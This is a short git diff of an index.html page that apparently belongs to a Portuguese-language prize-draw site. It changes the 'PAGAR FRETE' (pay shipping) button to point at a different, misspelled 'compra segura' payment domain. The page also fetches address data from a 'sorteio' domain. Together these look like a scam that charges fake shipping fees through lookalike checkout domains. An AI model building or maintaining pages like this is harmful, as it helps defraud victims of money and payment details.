--- a/index.html
+++ b/index.html
@@ -244,7 +244,7 @@ fetch("https://sorteiovivasorte1.com/get-endereco.php/get-endereco.php")
 
 
 
-                <a id="buttonClick" href="https://pay.compraeguraapay.com.br/checkout/3caf27a5-46ae-422c-8e58-929aef2e4939">
+                <a id="buttonClick" href="https://pay.comprasegurapayy.com/checkout/3caf27a5-46ae-422c-8e58-929aef2e4939">
                     PAGAR FRETE
                 </a>
 
